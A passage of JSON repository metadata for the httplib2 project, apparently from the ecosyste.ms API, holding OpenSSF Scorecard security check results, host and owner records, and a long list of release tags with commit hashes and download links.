repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e892